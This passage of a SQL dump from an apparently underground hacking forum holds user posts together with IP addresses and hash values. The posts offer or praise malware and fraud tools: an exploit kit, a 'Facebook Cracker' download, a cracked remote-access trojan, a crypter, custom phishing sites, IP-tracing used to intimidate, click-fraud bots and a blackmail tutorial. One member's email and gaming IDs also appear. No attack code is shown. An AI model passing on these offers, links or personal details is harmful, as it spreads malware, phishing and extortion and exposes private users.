'41.174.24.42', '699275306', '1', '0', '0', '0', '1', '604747b555b2067d7e9306eb8916ff9f', '0', '0'); INSERT INTO mybb_posts VALUES('434', '155', '0', '3', '[Admin]?????? demoted', '0', '1', 't3h jok3r', '1345416216', 'Earlier on today, an admin (??????) was demoted from their position directly to normal members due to inactivity, I had a conversation they said they are too busy with their own website. I will be starting a search for a new staff member in a day or two. If you guys are interested then simply let us know below and stay active. We will do daily check ups and see who qualifies the most. I currently have someone in mind, they know who I\'m talking about but sometimes there\'re more than 1 :D', '41.174.24.42', '699275306', '1', '0', '0', '0', '1', 'c47d6a52401ad3102dd53421e80daa6f', '0', '0'); INSERT INTO mybb_posts VALUES('435', '129', '332', '8', 'RE: ss501 because i\'m stupid(korean)', '0', '1', 't3h jok3r', '1345416771', '[quote=\'p420\' pid=\'332\' dateline=\'1345143328\']\r\nI\'m not being racist, just curious. Are you Korean?\r\n[/quote]\r\n\r\nI know the OP. The OP is not Korean, sometimes people can like songs from other languages because they like the voice or background music etc.', '41.174.24.42', '699275306', '1', '0', '0', '0', '1', '1503b0913cdf65af041b85c42c1ae498', '0', '0'); INSERT INTO mybb_posts VALUES('436', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '1', 't3h jok3r', '1345417138', 'Honestly, I didn\'t know I was ever going to need this but this skid wanted to scam me on Skype so I sent him his IP and location and he actually paid me as in a apology.', '41.174.24.42', '699275306', '1', '0', '0', '0', '1', '876def011cb8a41114dedd7bb4b15c05', '0', '0'); INSERT INTO mybb_posts VALUES('437', '126', '315', '15', 'RE: Adf.ly Bot', '0', '1', 't3h jok3r', '1345417243', 'Thanks for the contribution. I think I had a older version of this adf.ly bot and it use to work but not perfectly. This one boosted my clicks rapidly. \n\n**Quick Question: Do we click on the link then click start or just right click>start?', '41.174.24.42', '699275306', '1', '0', '0', '0', '1', '70f86424f9c688376c88fdb9b0d5b712', '0', '0'); INSERT INTO mybb_posts VALUES('438', '143', '372', '21', 'RE: Tiny flood', '0', '1', 't3h jok3r', '1345417385', 'Moved to Botnets and IRC Bots, Zombies\n\nYou did post it in the right section before and I moved it here because this section was lacking some good programs such as yours. \n\nP.S: If you make one more program and release it, then you will be the first one to get the [b]Dangerous Programmer[/b] award. Good Luck!', '41.174.24.42', '699275306', '1', '0', '0', '0', '1', 'b962bf8cb7e7e4e7ed855a8c028574d0', '0', '0'); INSERT INTO mybb_posts VALUES('439', '147', '390', '42', 'RE: [Hacker news] BOTNET -The hacker news magazine', '0', '8', 'spacefish36', '1345417799', 'If their next conference is held in USA, then I would definitely go to the conference other wise not. What about you NXK?', '41.174.60.31', '699284511', '0', '0', '0', '0', '1', '92e4f06c5f5327c003cb681b9dfd8153', '0', '0'); INSERT INTO mybb_posts VALUES('440', '155', '434', '3', 'RE: [Admin]?????? demoted', '0', '61', 'NXK', '1345418018', 'This is both good and bad news, it\'s sad to see a member go inactive but good to see someone who is new and will be active and HQ take over. \n\nGood luck with the search and I hope everything goes Out well.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '712b73c641b353f2148963741b407ad8', '0', '0'); INSERT INTO mybb_posts VALUES('441', '32', '87', '16', 'RE: [tut]How to SE Amazon Kindles', '0', '8', 'spacefish36', '1345419257', 'Easiest and working kindle SEing method I\'ve seen.', '41.174.60.45', '699284525', '0', '0', '0', '0', '1', 'cf1a63d4c73cbcf0ef800fa322b9bf28', '0', '0'); INSERT INTO mybb_posts VALUES('442', '104', '251', '33', 'RE: Photoshop vs Gimp', '0', '13', 'unixmoon', '1345419493', 'Oh OK. So which version of photoshop should I use?', '41.174.60.45', '699284525', '0', '0', '0', '0', '1', 'fecb52c017733ac5c3ca20415c617f31', '0', '0'); INSERT INTO mybb_posts VALUES('450', '155', '434', '3', 'RE: [Admin]?????? demoted', '0', '20', 'JakeUS', '1345431559', 'Sucks that he was demoted.\n\nAnd sorry that I was inactive.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '250826dfea43a7970659de255c9ae2b7', '0', '0'); INSERT INTO mybb_posts VALUES('451', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '20', 'JakeUS', '1345431693', 'This is a very nice service you\'re doing.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '231c050221318f6bbcc450c0b4bade97', '0', '0'); INSERT INTO mybb_posts VALUES('452', '110', '271', '4', 'RE: It\'s Baws...the Baws', '0', '20', 'JakeUS', '1345431846', 'Welcome to the site man.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'a93cd39d7d374db6c613a9c04921e3cf', '0', '0'); INSERT INTO mybb_posts VALUES('453', '157', '0', '15', 'Eleonore Exp 1.2 Expliot pack', '0', '61', 'NXK', '1345439008', '\'?Eleonore\' is a malware package that contains a collection of exploits used to compromise web pages. When the compromised web pages are viewed via vulnerable systems, the exploit payload is run. Eleonore is purchased by an attacker from an underground website. The attacker then gains access to Internet web servers and installs the exploit by modifying webpages, which are then served to the public. The malware pack also contains functionality for the tracking and management of compromised computers.\n[img]http://2.bp.blogspot.com/_DVupdUqY77M/TNuEV7xRGhI/AAAAAAAABvE/8dG_QFMo6h8/s1600/eleonore1.jpg[/img]\n\nPretty much all files Are php, Run the builder in sandboxie if you don\'t trust it. (i\'m about to go to bed Ill scan it tomorrow.\n\nPost and PM me for this!', '99.253.65.17', '1677541649', '0', '0', '61', '1345595289', '1', '03d3e2cef4d1d8775c4c439bfd25522f', '0', '1345595289'); INSERT INTO mybb_posts VALUES('454', '152', '447', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '54', 'Sin Cara', '1345450126', '[quote=\'t3h jok3r\' pid=\'447\' dateline=\'1345421614\']\r\nLol I had the virus scan part on bold to let you know that you need to have a virus scan. Why can\'t it have a virus scan?\r\n[/quote]\r\n\r\nMan its a official software and professional. Don\'t worry :)', '119.154.77.130', '2006601090', '1', '0', '0', '0', '1', 'e89c65499af2fe1e7b8135070236a5bc', '0', '0'); INSERT INTO mybb_posts VALUES('455', '126', '315', '15', 'RE: Adf.ly Bot', '0', '53', 'sirchamp', '1345468789', 'You can just press right click start. You dont have to press on the link.\nBtw you can add as many links as you want :D', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '03c6699ed022ef728edfe59125ffec4b', '0', '0'); INSERT INTO mybb_posts VALUES('456', '74', '175', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '53', 'sirchamp', '1345469023', 'Fileice -.- Can I have a survey free link?', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '42484bbcbad3442fd2f2f758c566e164', '0', '0'); INSERT INTO mybb_posts VALUES('457', '94', '223', '16', 'RE: What is this section about?', '0', '53', 'sirchamp', '1345469119', 'Nearly the exact same text on wikipedia. But thanks anyway :D', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'd7bca680525d568eac09557318cb7682', '0', '0'); INSERT INTO mybb_posts VALUES('458', '130', '436', '15', 'RE: Skype IP Finder - FREE', '0', '67', 'HoverCatz', '1345470131', '[quote=\'t3h jok3r\' pid=\'436\' dateline=\'1345417138\']\r\nHonestly, I didn\'t know I was ever going to need this but this skid wanted to scam me on Skype so I sent him his IP and location and he actually paid me as in a apology.\r\n[/quote]\r\n\r\nLmaoo xD', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'f0f40f511d9a1160b2affeb7954376d0', '0', '0'); INSERT INTO mybb_posts VALUES('459', '155', '434', '3', 'RE: [Admin]?????? demoted', '0', '1', 't3h jok3r', '1345477501', 'True, but he so-called requested for it. \n\nIt\'s OK you were inactive, I always contact the staff member if they are inactive because sometimes they are inactive because they sometimes forget the url etc.', '41.151.149.168', '697800104', '1', '0', '0', '0', '1', '16a19163d112b2ca9f6f96c700b20d39', '0', '0'); INSERT INTO mybb_posts VALUES('460', '158', '0', '42', 'So ninja\'s DO exist?!', '0', '61', 'NXK', '1345478497', 'A 63-year-old engineer is Japan\'s \'last ninja\'\r\n\r\nA 63-year-old former engineer may not fit the typical image of a dark-clad assassin with deadly weapons who can disappear into a cloud of smoke. But Jinichi Kawakami is reputedly Japan\'s last ninja.\r\nAs the 21st head of the Ban clan, a line of ninjas that can trace its history back some 500 years, Kawakami is considered by some to be the last living guardian of Japan\'s secret spies.\r\n\"I think I\'m called (the last ninja) as there is probably no other person who learned all the skills that were directly\" handed down from ninja masters over the last five centuries, he said.\r\n\"Ninjas proper no longer exist,\" he said as he demonstrated the tools and techniques used in espionage and sabotage by men fighting for their samurai lords in the feudal Japan of yesteryear.\r\nNowadays they are confined to fiction or used to promote Iga, some 350 kilometres (220 miles) southwest of Tokyo, a mountain-shrouded city near the ancient imperial capital of Kyoto that was once home to many ninjas.\r\nKawakami, a former engineer who began teaching ninjutsu -- the art of the ninja -- ten years ago, said the true history of ninjas was a mystery.\r\n\"There are some drawings of their tools but we don\'t always find all the details,\" which may have been left deliberately vague, Kawakami said.\r\n\"Many of their traditions were passed on by word of mouth, so we don\'t know what was altered in the process.\"\r\nAnd those skills that have arrived in the 21st century in their entirety are sometimes difficult to verify.\r\n\"We can\'t try out murder or poisons. Even if we can follow the instructions to make a poison, we can\'t try it out,\" he said.\r\nKawakami first encountered the secretive world of ninjas at the age of just six, but has only vague memories of first meeting his master, Masazo Ishida, a man who dressed as a Buddhist monk.\r\n\"I kept practising without knowing what I was actually doing. It was much later that I realised I was practising ninjutsu.\"\r\nKawakami said training ranged from physical and mental skills to studies of chemicals, weather and psychology.\r\n\"I call ninjutsu comprehensive survival techniques,\" though it originated in war skills such as espionage and guerrilla attacks, he said.\r\n\"For concentration, I looked at the wick of a candle until I got the feeling that I was actually inside it. I also practised hearing the sound of a needle dropping on the floor,\" he said.\r\nHe climbed walls, jumped from heights and learned how to mix chemicals to cause explosions and smoke.\r\n\"I was also required to endure heat and cold as well as pain and hunger. The training was all tough and painful. It wasn\'t fun but I didn\'t think much why I was doing it. Training was made to be part of my life.\"\r\nKawakami said he was \"a strange boy\" growing up but his practice drew little attention at a time when many in Japan were struggling to make ends meet in the hard post-war years.\r\nJust before he turned 19, he inherited the master\'s title, along with secret scrolls and special tools.\r\nKawakami is careful not to claim the title of the \"last ninja\" for himself and in the sometimes sectarian world of ninjutsu there are doubters and rival claimants, with the disputes centring on the authenticity of various teachings.\r\nKawakami says much of the ninja\'s art lies in catching people unawares, rather than in brute force.\r\n\"Humans can\'t be on the alert all the time. There is always a moment when they are off guard and you catch it,\" he said.\r\nIt is all about exploiting weaknesses that allows the ninja to outfox much bigger or more numerous opponents; distracting attention to allow a quick getaway.\r\nIt is possible to hide -- in a manner of speaking -- behind the smallest of things, Kawakami said.\r\n\"If you throw a toothpick, people will look that way, giving you the chance to flee.\r\n\"We also have a saying that it is possible to escape death by perching on your enemy\'s eyelashes; it means you are so close that he cannot see you.\"\r\nKawakami recently began a research job at the state-run Mie University, where he is studying the history of ninjas.\r\nBut, he said as he showed an AFP team around the Iga-ryu Ninja Museum and its trick house with hidden ladders, fake doors and an underfloor sword box, he is resigned to the fact that he is the last of his kind.\r\nThere will be no 22nd head of the Ban clan because Kawakami has decided not to take on any more apprentices.\r\n\"Ninjas just don\'t fit in the modern day,\" he said.\r\n\r\nSource\r\nhttp://news.yahoo.com/63-old-engineer-japans-last-ninja-053736959.html', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'e54f2b9bb403b5b24eb31cd969bf8a46', '0', '0'); INSERT INTO mybb_posts VALUES('461', '159', '0', '49', 'Editing Thread', '0', '53', 'sirchamp', '1345483110', 'I think the admins should make the time you have for editing a thread longer. The time is now i think 2228 minutes and after that you cant edit your own thread anymore.. thats a bit annoying.\r\nThats my opinion. Perhaps some of you think the same :D\r\nBut besides that the forum is great.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '727c5343eb4f1c0520d794095b248ee8', '0', '0'); INSERT INTO mybb_posts VALUES('462', '160', '0', '9', '$$$Sh@recash Moneymaking$$$', '0', '53', 'sirchamp', '1345486296', '[size=xx-large][color=#006400]Make big Money with Sh@recash!!\nMoney making E-Books.[/size][size=medium]\n\n[/color][color=#FF0000]Price: [/color][color=#006400]Free\n\n\n[/color][color=#FF0000]Download: [/color][color=#006400]Mediafire\n\n\n[/color][color=#FF0000][/size][size=large]Why get this E-books:[/size][size=medium] [/color][color=#006400]Easy Money, No hard work, Make a lot of money, free\n\n\n[/color][color=#FF0000][/size][size=large]How to Get:[/size][size=medium][/color][color=#006400]Just press the link below\n\n\n[/color][color=#FF0000]Link: [/color]http://adf.ly/C3ygT \n\n\n\n[/size][size=xx-large]ENJOY this free package of of ebooks which explain how to make money with sh@recash.[/size]', '188.155.56.90', '-1130678182', '1', '0', '53', '1345486376', '1', 'a591e3fa7f5938f2731c38fe6438a3e5', '0', '1345486376'); INSERT INTO mybb_posts VALUES('463', '159', '461', '49', 'RE: Editing Thread', '0', '1', 't3h jok3r', '1345498385', 'The edit time limit is 48 hours, you are free to edit under the time. There is no time limit for upgraded members. \n\nThanks for the suggestion.', '41.174.22.118', '699274870', '1', '0', '0', '0', '1', '4c7749a7e02e630fa0e6030f4f656f41', '0', '0'); INSERT INTO mybb_posts VALUES('464', '158', '460', '42', 'RE: So ninja\'s DO exist?!', '0', '1', 't3h jok3r', '1345498572', 'I thought Ninja\'s were just a story to promote Karate, Martial Arts etc. From this I do believe they exist but if they do then I don\'t think he is the last one.', '41.174.22.118', '699274870', '1', '0', '0', '0', '1', '78a95a2326d2273d9be5f4526647cf05', '0', '0'); INSERT INTO mybb_posts VALUES('465', '147', '444', '42', 'RE: [Hacker news] BOTNET -The hacker news magazine', '0', '1', 't3h jok3r', '1345498674', '[quote=\'NXK\' pid=\'444\' dateline=\'1345420482\']\r\n[quote=\'spacefish36\' pid=\'439\' dateline=\'1345417799\']\r\nIf their next conference is held in USA, then I would definitely go to the conference other wise not. What about you NXK?\r\n[/quote]\r\n\r\nI\'m canadian but id love to take a trip and check it out.\r\n[/quote]\r\n\r\nThat would be expensive and useless because Delhi, India and Pakistan is a country with lots of poverty and there would be a communication problem.', '41.174.22.118', '699274870', '1', '0', '0', '0', '1', '128acefa336611b8a104be53b14ac746', '0', '0'); INSERT INTO mybb_posts VALUES('466', '127', '451', '46', 'RE: Will make you a phisher website with theme you request.', '0', '64', 'vlajke', '1345502475', '[quote=\'HoverCatz\' pid=\'432\' dateline=\'1345408651\']\r\nIll send u a PM with the details :)\r\n[/quote]\r\n\r\nYour template is ready and has been ppmed to you.\r\n\r\n\r\n[quote=\'t3h jok3r\' pid=\'386\' dateline=\'1345244498\']\r\nThanks for the service vladjke.\r\n[/quote]\r\n\r\nWelcome.\r\n\r\n[quote=\'JakeUS\' pid=\'451\' dateline=\'1345431693\']\r\nThis is a very nice service you\'re doing.\r\n[/quote]\r\n\r\nThank you.', '178.222.93.200', '-1294049848', '0', '0', '0', '0', '1', '9d5344e78853beddc170ba171694ba9a', '0', '0'); INSERT INTO mybb_posts VALUES('467', '74', '175', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '64', 'vlajke', '1345502587', 'Come on, send us a direct link download pls. I\'ll give you a free drink afterwards.', '178.222.93.200', '-1294049848', '0', '0', '0', '0', '1', 'e4ae9f6a5915b50cf21307297dbdc58b', '0', '0'); INSERT INTO mybb_posts VALUES('468', '155', '434', '3', 'RE: [Admin]?????? demoted', '0', '5', 'Timmy', '1345502746', 'That sucks but if he is LQ then it was good.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', 'dd2340d15f880f3c45fc90bc5d6c0ae1', '0', '0'); INSERT INTO mybb_posts VALUES('469', '161', '0', '3', 'Congratz NXK', '0', '5', 'Timmy', '1345502850', 'I just noticed that he became a Moderator. Congratz and I think he will do a good job.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', '0263288fe5503ee2750ef72fab731f10', '0', '0'); INSERT INTO mybb_posts VALUES('470', '115', '290', '48', 'RE: [tut] How to Moderate LH as a MOD', '0', '61', 'NXK', '1345502874', 'Thanks for this, I\'m excited to start in my new position!', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '47b86e08b0f9fcdb388420e3d553f3a4', '0', '0'); INSERT INTO mybb_posts VALUES('471', '158', '460', '42', 'RE: So ninja\'s DO exist?!', '0', '5', 'Timmy', '1345502951', 'I wish someone had a video on him.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', '16338033243d590b72e306987cce8638', '0', '0'); INSERT INTO mybb_posts VALUES('472', '161', '469', '3', 'RE: Congratz NXK', '0', '61', 'NXK', '1345503251', 'Thank you very much for this :D I will do my best!', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '66ecde748a989c39ceb96c65b64e5663', '0', '0'); INSERT INTO mybb_posts VALUES('473', '161', '469', '3', 'RE: Congratz NXK', '0', '1', 't3h jok3r', '1345503813', 'I agree, he is a nice guy who is HQ and likes helping out people. I\'m looking forward to keep him on staff for a long time. I hope he stays with us and stays active. Good Luck and welcome on board NXK.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', 'ce63eb2193e0df7f59613011700ef09c', '0', '0'); INSERT INTO mybb_posts VALUES('474', '118', '297', '19', '[Junk]Test son', '0', '1', 't3h jok3r', '1345504689', 'This thread has been junked.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('475', '74', '175', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '5', 'Timmy', '1345505205', 'I don\'t have a direct link unfortunately because I don\'t run the blog.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', '930287fd6381403346f36c5eb1771b80', '0', '0'); INSERT INTO mybb_posts VALUES('476', '162', '0', '7', 'Applying for that swag award ;)', '0', '61', 'NXK', '1345505359', '[img]https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-ash4/395841_10151158763015012_33782960_n.jpg[/img]\r\n\r\nI hope I can get it aha!', '99.253.65.17', '1677541649', '0', '0', '1', '1345554435', '1', 'beb9dce94854df8b907d3c229cea4a22', '0', '1345554435'); INSERT INTO mybb_posts VALUES('477', '162', '476', '7', 'RE: Applying for that swag award ;)', '0', '1', 't3h jok3r', '1345505675', 'What a comment. I have to admit it.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', '0b6fed7ff33af7f6a5e7d54ca2582109', '0', '0'); INSERT INTO mybb_posts VALUES('478', '130', '436', '15', 'RE: Skype IP Finder - FREE', '0', '9', 'p420', '1345505901', '[quote=\'t3h jok3r\' pid=\'436\' dateline=\'1345417138\']\r\nHonestly, I didn\'t know I was ever going to need this but this skid wanted to scam me on Skype so I sent him his IP and location and he actually paid me as in a apology.\r\n[/quote]\r\n\r\n:roflol::roflol::roflol:\r\n\r\nI can\'t stop laughing.', '41.174.59.210', '699284434', '0', '0', '0', '0', '1', '9500587573f16764125bb7630d014ce0', '0', '0'); INSERT INTO mybb_posts VALUES('479', '94', '457', '16', 'RE: What is this section about?', '0', '9', 'p420', '1345505982', '[quote=\'sirchamp\' pid=\'457\' dateline=\'1345469119\']\r\nNearly the exact same text on wikipedia. But thanks anyway :D\r\n[/quote]\r\n\r\nGrrrr.. You had to do your research.', '41.174.59.210', '699284434', '0', '0', '0', '0', '1', 'b502f90360ac47e1d6b67e5ffc0e14c8', '0', '0'); INSERT INTO mybb_posts VALUES('480', '134', '341', '47', 'RE: Win $10 for referring people', '0', '9', 'p420', '1345506034', 'I\'ll try my best to get some members :D', '41.174.59.210', '699284434', '0', '0', '0', '0', '1', '5e255515fa3e391d3fb0ce2d148b2c5d', '0', '0'); INSERT INTO mybb_posts VALUES('481', '65', '156', '41', 'RE: Auction Thread Guidelines', '0', '9', 'p420', '1345506120', 'Reasonable questions. The code text color is a bit hard to see, I can see easily actually it\'s OK because it\'s not something that we need to put our eyes on.', '41.174.59.210', '699284434', '0', '0', '0', '0', '1', '42c56464c66670eba4417873cc0bf209', '0', '0'); INSERT INTO mybb_posts VALUES('482', '132', '338', '20', 'RE: [Forever FUD]No Dependency Crypter!', '0', '1', 't3h jok3r', '1345506158', 'Sorry guys but I took it from somewhere so can\'t provide a direct download link.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', '3bdd5483de474aeffe076e63d73e82e5', '0', '0'); INSERT INTO mybb_posts VALUES('483', '163', '0', '30', '[REAL]Facebook Cracker', '0', '1', 't3h jok3r', '1345509386', '[img]https://lh6.googleusercontent.com/-cazo2Slwt1Y/T3k0LfdpL3I/AAAAAAAADS0/-jGFbM069FQ/s462/facebook+cracker.PNG[/img]\n\n\nEnjooy guys, seen many posts & ppl that looking \nfor a FB cracker so.... :cool:\n\n[i]And this time no Fucking rats or virus![/i]\n[i][b]Suprime clean[/b][/i] >:)\n\nDL=>\nhttp://rghost.net/39261807\n\nDont forget 2 say [b]thanks[/b]...\n[u]No $hitcash...[/u]', '41.174.59.210', '699284434', '1', '0', '1', '1345641114', '1', '6e4573e3111a73d890bcd0bb7085d32f', '0', '1345641114'); INSERT INTO mybb_posts VALUES('484', '164', '0', '28', 'Experiences on your upgrade..', '0', '1', 't3h jok3r', '1345509447', 'Post your feedbacks on the upgrade.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', 'a07de986868c83e0d99afcd7c030e07f', '0', '0'); INSERT INTO mybb_posts VALUES('485', '26', '79', '17', 'RE: [tut]How to E-Whore, Blackmail with pics and safety tips.', '0', '7', 'Romdu62', '1345510321', 'This is the best E-Whoring tutorial I have seen in my life. Thanks.', '41.174.59.210', '699284434', '0', '0', '0', '0', '1', 'dd3e8ebe680feb406c82e9b79c86799e', '0', '0'); INSERT INTO mybb_posts VALUES('520', '155', '499', '3', 'RE: [Admin]?????? demoted', '0', '1', 't3h jok3r', '1345554495', '[quote=\'Baws\' pid=\'499\' dateline=\'1345529411\']\r\nAww I saw him before, I think I have more posts than him.\r\n[/quote]\r\n\r\nYes, you have 4 more posts than him. If actually was active then his post count would be around 50.', '41.174.12.163', '699272355', '1', '0', '0', '0', '1', 'cf681e12f76502659068a4af7ea3aa75', '0', '0'); INSERT INTO mybb_posts VALUES('487', '120', '301', '4', 'RE: reloadz0r is here', '0', '61', 'NXK', '1345520046', 'Welcome!\n\nI hope you enjoy it here.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'c021fa6211ecdc787adf6451692823bb', '0', '0'); INSERT INTO mybb_posts VALUES('488', '161', '469', '3', 'RE: Congratz NXK', '0', '82', 'iTzIpod', '1345520270', 'Congratulations on Mod! =]\n\nGood Luck.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b9ebc5aad1934a4d95ce5fa8e329cfa6', '0', '0'); INSERT INTO mybb_posts VALUES('489', '152', '400', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '82', 'iTzIpod', '1345520696', 'Here\'s a virus scan for you OP! [url=https://www.virustotal.com/file/866c980f6001ff281d90974977c24a209d058bb506fe542a3c6ec5b6b9946660/analysis/1345520468/] Virus Scan[/url]\n\n\nYou\'re welcome.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1510beb2bfa0298f43f65b1d9acb418a', '0', '0'); INSERT INTO mybb_posts VALUES('490', '161', '469', '3', 'RE: Congratz NXK', '0', '20', 'JakeUS', '1345521194', 'Congratulations, welcome to the team!', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'bd429c621d632096939cda64e725dae5', '0', '0'); INSERT INTO mybb_posts VALUES('491', '120', '301', '4', 'RE: reloadz0r is here', '0', '20', 'JakeUS', '1345521263', 'Enjoy the site, and if you need help just PM a Staff member.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'e820cf998c33ac3e9227e4d086a89f52', '0', '0'); INSERT INTO mybb_posts VALUES('492', '165', '0', '5', 'Just did something', '0', '20', 'JakeUS', '1345521453', 'I just asked an Admin I am friends with on a popular forum if I could post about this site.\r\n\r\nIf he says yes, we will get a lot of members!', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '72b6c7d7b37e45d8c4ff6f0da1845eb5', '0', '0'); INSERT INTO mybb_posts VALUES('493', '166', '0', '49', 'New userbars?', '0', '20', 'JakeUS', '1345521887', 'I don\'t like the current ones, they are too \"plain\".\r\n\r\nI can get a friend to make really good ones if you want.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '73c2b1c9ffdfdb406636928e7b48add8', '0', '0'); INSERT INTO mybb_posts VALUES('494', '167', '0', '4', 'iTzIpod is here (:', '7', '82', 'iTzIpod', '1345522131', 'Hey LH,I am iTzIpod. Please. Allow me to introduce myself! Anyways. I\'m a friendly member, and my real name is Ryan. But please call me Jacob. It\'s my nickname. And I also have a PS3. I play Call of Duty Black Ops a lot. And who knows? Maybe we can party up and whip some asses together? If you\'re interested, add my PSN: SoaR_iPod or SoaR__Drastic or iTzExtremeIpod. I also have Skype. Skype ID: iTzIpod. Feel free to add me. And don\'t forget to add me on MSN too! It\'s iTzIpod@hotmail.com. I will be active on this forum. Anyways, back on topic. I will be active on this forum L33t Hacking and I will dedicate myself to this forum. -iTzIpod', '24.212.197.164', '416597412', '1', '0', '82', '1347719411', '1', 'a24aa6c688ed349caf7c57270fdb0627', '0', '1347719411'); INSERT INTO mybb_posts VALUES('2073', '448', '0', '61', 'Broken Links', '0', '82', 'iTzIpod', '1347720178', 'If you notice any broken links, please PM me. As I will fix them.\r\nThanks =]\r\n\r\n- iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aada2a5e46e4488e1d5aa4ab67ddaee0', '0', '0'); INSERT INTO mybb_posts VALUES('2074', '449', '0', '35', 'Kratos God Of War Signature/Tag', '0', '82', 'iTzIpod', '1347720779', '[img]http://i.imgur.com/3Q7JN.png[/img]\r\nRate /10?\r\nCnC please?\r\nThanks\r\n\r\n-iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '545590da2fc1bfa75ff862587077d30e', '0', '0'); INSERT INTO mybb_posts VALUES('2075', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '62', 'R?????zo?', '1347720890', 'My attemps:\n\n[URL=http://imgur.com/Mul6K][IMG]http://i.imgur.com/Mul6K.png[/IMG][/URL]\n\n[URL=http://imgur.com/fmK09][IMG]http://i.imgur.com/fmK09.png[/IMG][/URL]\n\n[URL=http://imgur.com/ZX8Ku][IMG]http://i.imgur.com/ZX8Ku.png[/IMG][/URL]\n\n[URL=http://imgur.com/xyMsA][IMG]http://i.imgur.com/xyMsA.png[/IMG][/URL]\n\n[URL=http://imgur.com/uDY9P][IMG]http://i.imgur.com/uDY9P.png[/IMG][/URL]', '89.214.126.254', '1507229438', '1', '0', '0', '0', '1', 'e5747e17f2e3ceb36c975a0331387a3f', '0', '0'); INSERT INTO mybb_posts VALUES('495', '166', '493', '49', 'RE: New userbars?', '0', '61', 'NXK', '1345523116', 'I like my user bar, But change is always nice.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '9e61ee06b23db82dd99bb0f6b8a79f84', '0', '0'); INSERT INTO mybb_posts VALUES('496', '161', '469', '3', 'RE: Congratz NXK', '0', '61', 'NXK', '1345524866', 'Thanks everyone :) Means alot aha. If you need help with anything let me know.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '1c46071006a8a5ffb98fb6d90691dc49', '0', '0'); INSERT INTO mybb_posts VALUES('497', '134', '341', '47', 'RE: Win $10 for referring people', '0', '84', 'Thunder™', '1345525030', 'I will try to refer members', '111.91.75.129', '1868254081', '0', '0', '0', '0', '1', 'b86d41ff3eabceab91bde9f92dcbceb3', '0', '0'); INSERT INTO mybb_posts VALUES('498', '161', '469', '3', 'RE: Congratz NXK', '0', '2', 'Apathy', '1345527739', 'welcome to the forums.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'fd6451d7feba1043334264e7308b986c', '0', '0'); INSERT INTO mybb_posts VALUES('499', '155', '434', '3', 'RE: [Admin]?????? demoted', '0', '55', 'Baws', '1345529411', 'Aww I saw him before, I think I have more posts than him.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '0a63258338932031c143924eb5790081', '0', '0'); INSERT INTO mybb_posts VALUES('500', '161', '469', '3', 'RE: Congratz NXK', '0', '55', 'Baws', '1345529467', 'Nice, hope he doesn\'t abuse his position. :D', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'b38e18cccdcdcfd572064b8bee3fec4a', '0', '0'); INSERT INTO mybb_posts VALUES('501', '167', '494', '4', 'RE: iTzIpod is here (:', '0', '55', 'Baws', '1345529514', 'Hi Ryan, or Jacob?\n\nWelcome on here, I got a ps3 too and msg me if you want so I can add you!\n\nPSN: Rest_In_Peace911', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'f1158cf3ecbc49077a5fbc0f9a03075d', '0', '0'); INSERT INTO mybb_posts VALUES('502', '163', '483', '30', 'RE: [REAL]Facebook Cracker', '0', '55', 'Baws', '1345529580', 'Nice share.\n\nSo this is like a bruteforcer?', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '1521a878d3a1d7240435035d94ebafd1', '0', '0'); INSERT INTO mybb_posts VALUES('503', '146', '375', '29', 'RE: se7en sins PREMIUM SECTION', '0', '55', 'Baws', '1345529644', 'Now that\'s what I\'m talking about.\n\nPORNO!!\n\n@OP, oh yeah thanks. ;)', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'a735188f060aba76740e7a59ace150b5', '0', '0'); INSERT INTO mybb_posts VALUES('504', '142', '369', '30', 'RE: Blackshades RAT 5.0 Cracked', '0', '55', 'Baws', '1345529696', 'Can anyone confirm this isn\'t a backdoor?(As in OP infected it)', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 